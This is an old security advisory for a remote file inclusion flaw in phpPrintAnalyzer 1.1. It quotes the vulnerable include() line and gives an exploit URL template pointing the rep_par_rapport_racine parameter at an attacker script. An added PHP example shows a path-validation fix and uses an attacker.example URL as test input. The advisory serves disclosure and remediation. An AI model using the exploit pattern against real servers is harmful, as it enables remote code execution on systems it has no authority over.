---------------------------------------------------------------------------------------

phpPrintAnalyzer 1.1 rep_par_rapport_racine Remote File Inclusion

---------------------------------------------------------------------------------------

Author   : Sh3ll

Date     : 2006/04/27

Location : Iran - Tehran

HomePage : http://www.sh3ll.ir

Email    : sh3ll[at]sh3ll[dot]ir

Critical Level : Dangerous

---------------------------------------------------------------------------------------

Affected Software Description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

Application : phpPrintAnalyzer 

version     : 1.1

URL         : http://tpequet.free.fr/phpPrintAnalyzer

Description : 


phpPrintAnalyzer is a web application for the CUPS system that analyzes the "page_log" files and produces HTML graphics (with JpGraph).

 

---------------------------------------------------------------------------------------

Vulnerability:

~~~~~~~~~~~~~

In index.php we found the following vulnerable code:

----------------------------------------index.php--------------------------------------

....

<?php

        include($rep_par_rapport_racine."inc/img.inc.php");

        ?>

...

---------------------------------------------------------------------------------------

Exploit:

~~~~~~~

http://www.target.com/[phpPrintAnalyzer]/index.php?rep_par_rapport_racine=[Evil Script]


Solution:

~~~~~~~~

Sanitize the variable $rep_par_rapport_racine in index.php
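
One way to apply this fix, shown as an added example that is not phpPrintAnalyzer's own code: the base directory is set by the application itself and the resolved path is checked before include(). The helper name resolve_include(), the temporary sandbox directory and the request value are assumptions constructed for the demonstration; only inc/img.inc.php and $rep_par_rapport_racine come from the advisory.

```php
<?php
// Added example (not phpPrintAnalyzer source). resolve_include() and the
// sandbox layout are hypothetical; inc/img.inc.php is the path from index.php.

// Return the absolute path of $file under $root, or false if it is a URL
// wrapper, does not exist, or resolves outside $root.
function resolve_include($root, $file)
{
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $file)) {
        return false;                       // http://, ftp://, php://, data: ...
    }
    $rootReal = realpath($root);
    $target   = realpath($root . '/' . $file);
    if ($rootReal === false || $target === false || !is_file($target)) {
        return false;
    }
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($target, $prefix, strlen($prefix)) === 0 ? $target : false;
}

// Constructed sandbox standing in for the application directory.
$appRoot = sys_get_temp_dir() . '/ppa_demo_' . getmypid();
mkdir($appRoot . '/inc', 0700, true);
file_put_contents($appRoot . '/inc/img.inc.php', "<?php echo \"img.inc.php loaded\\n\";");

// Constructed request value; with register_globals = On this would have
// become $rep_par_rapport_racine in the vulnerable index.php.
$_GET['rep_par_rapport_racine'] = 'http://attacker.example/';

// Hardened form: the base directory is fixed by the application and the
// request parameter is never consulted.
$rep_par_rapport_racine = $appRoot . '/';
$path = resolve_include($rep_par_rapport_racine, 'inc/img.inc.php');
if ($path === false) {
    die("refusing to include\n");
}
include $path;

// The same check applied to a request-supplied prefix and to a traversal path.
var_dump(resolve_include($appRoot, $_GET['rep_par_rapport_racine'] . 'inc/img.inc.php'));
var_dump(resolve_include($appRoot, '../../etc/passwd'));

// Remove the constructed sandbox.
unlink($appRoot . '/inc/img.inc.php'); rmdir($appRoot . '/inc'); rmdir($appRoot);
```

The query-string value only reaches $rep_par_rapport_racine when register_globals is On, and a remote URL is only fetched when allow_url_fopen (and, from PHP 5.2, allow_url_include) permits it, so turning these off in php.ini limits the issue even before the code is patched.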

----------------------------------------------------------------------------------------

Shoutz:

~~~~~~

~ Special Greetz to My Best Friends Atena & N4sh3n4s

~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams 
